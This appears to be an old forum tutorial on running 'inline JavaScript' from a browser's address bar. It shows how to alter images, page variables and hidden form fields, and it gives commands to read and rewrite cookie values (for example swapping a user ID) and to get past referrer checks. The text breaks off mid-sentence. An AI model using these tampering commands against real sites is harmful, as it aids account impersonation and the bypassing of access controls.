Using Inline Javascript the user can alter things in a website without having to leave it or save the page in his PC. This is done using the address bar from his browser. The syntax of the commands looks like this:
For displaying the code I have replaced javascript with javascrit, and
CODE :
javascrit:alert(#command#)
For example, if you want to see an alert inside the http://www.example.com site, type the URL in the adress bar and when the
page loads, delete the URL and type:
CODE :
javascrit:alert("Hello World")
As a new URL. This way an alert will show up saying 'Hello World'. However, with this technique someone can alter almost everything in a page. For example an image. Lets suppose that there is an image with the site's logo. By viewing the source of the page (This can be done by going to View-Source) we find this piece of HTML code:
CODE :
[IMG Name="hi" SRC="hello.gif"]
So there is an image named "hi" and the source of it is "hello.gif". We want to change this to "bye.jpeg" that is stored on our site http://www.mysite.com. So the full URL of our image is http://www.mysite.com/bye.jpeg
Using Inline javascript we type in the adress bar:
CODE :
javascrit:alert(document.hi.src="http://www.mysite.com/bye.jpeg")
You will see an alert saying http://www.mysite.com/bye.jpeg and after that the image will be changed. Notice though that those changes are temporary! If you refresh the page or enter it again your changes will be lost, because you dont alter the site in the server but in your PC.
Using the same way we can view or change the value of variables. For example we find this piece of code in the site's source:
CODE :
[SCRIPT LANGUAGE="javascrit"]
var a="test"
[/SCRIPT]
This means that the variable with the name a has the value "test". In order to view the value of the variable we would type:
CODE :
javascrit:alert(a)
And in order to change it from 'test' to 'hello':
CODE :
javascrit:alert(a="hello")
However Inline Javascript is mostly used in changing form's attributes. Thats the piece of code we have:
CODE :
[form name="format" action="send.php" method="post"]
[input type="hidden" name="mail" value="someone@somewhere.com"]
[input type="text" name="name"]
[input type="submit" value="submit"][/form]
We want the form to be sent to our mailbox and not to someone@somewhere.com
This can be done by this command:
CODE :
javascrit:alert(document.format.mail.value="me@hacker.com")
As you have noticed by now we always use a hierarchy in the items we edit:
We start from the bigger to the smaller:
1) We started with document
2) We typed the name of the object we wanted to alter (for example document.hi.src) or the item in which it belonged and then the name of it (for example document.format.mail.value)
3) Lastly we ended in the attribute of the item we wanted to change (for example its source: document.hi.src, or its value: document.format.mail.value)
4) We separated the words using dots (.)
5) When we wanted to change an attribute we used the equal sign (=) and the new attribute.
*NOTE: We use "" when the new attribute is a character string (for example: document.format.mail.value="me@hacker.com")
If we wanted it to be the value of a variable we wouldnt used the "". For example we want to change the variable a's value to
the value of variable b.We would type javascrit:alert(a=b)
However most items in a page have no name. For example:
CODE :
[form action="send.php" method="post"]
[input type="hidden" name="mail" value="someone@somewhere.com"]
[input type="text" name="name"]
[input type="submit" value="submit"][/form]
In this code the form's name is missing. Using all the above, the command would look like this:
CODE :
javascrit:alert(document. .mail.value="me@hacker.com")
In this case we will have to count all the forms to find out the form's number. I will use an example:
CODE :
[form action="send.php" method="post"]
[input type="text" name="name"]
[input type="submit" value="submit"]
[/form]
[form action="send.php" method="post"]
[input type="hidden" name="mail" value="someone@somewhere.com"]
[input type="text" name="name"]
[input type="submit" value="submit"]
[/form]
[form action="send.php" method="post"]
[input type="text" name="name"]
[input type="submit" value="submit"]
[/form]
In this code we see 3 forms, but the one we are interested in is the second. So the number of the form we want is 2.
We must not forget that we start counting from number 1. We say 1,2,3,4... However in JavaScript the counting starts from number 0.It goes 0,1,2,3 etc.
So the actual number of the form is number 1 not 2. In general find the number of the form and take out one (number-1).
We will use this number to fill in the gap in our command:
CODE :
javascrit:alert(document.forms[1].mail.value="me@hacker.com")
Like this you can change images or links that have no name. To do that just change "forms" to the type of item you want to change:
For Images it would be:
CODE :
javascrit:alert(document.images[3].src="#the url of the picture you want#")
For links it would be:
CODE :
javascrit:alert(document.links[0].href="#the url you want#")
Lastly, we can use this technique to edit cookies.
The command is the following and was written by Dr_aMado from triviasecurity.net, but i altered it a bit so that it shows the cookie before the user edits it.
Just copy-paste this line to the adress bar:
CODE :
javascrit:alert(window.c=function a(n,v,nv){c=document.cookie;c=c.substring(c.indexOf(n)+n.length,c.length);c=c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace(v,nv);document.cookie=n+"="+escape(nc);return unescape(document.cookie);});alert('The cookie is: "'+document.cookie+'"');alert(c(prompt("The name of the cookie:",""),prompt("Change this value:",""),prompt("with this:","")));
** Added by Kane:
If you would like to edit your cookies manually, then this command will do that for you.
CODE :
javascrit:alert(document.cookie)
That will show you your current cookie. Say for example, that is 'userid=1'. You want to change that to 'userid=2'. You would use the following command:
CODE :
javascrit:alert(document.cookie="userid=2")
As a conclusion, i must stress that the changes are made only on the user's side! It's like saving the site in your PC and then modifying it. However, using this technique you can trick a page (for example with cookies) or pass the reference security of a page.
For example some pages check from where the user sends the data. Specifically if the data from http://www.test.com/form.php was sent to http://www.test.com/check.php
check.php would possible check if the data was sent from the form in http://www.test.com/form.php
Except for that, if you manage to enter your own JavaScript code in a page, using something like this technique you will be able to alter pictures and staff like that permanently!
However you need further knowl
Previous
Home
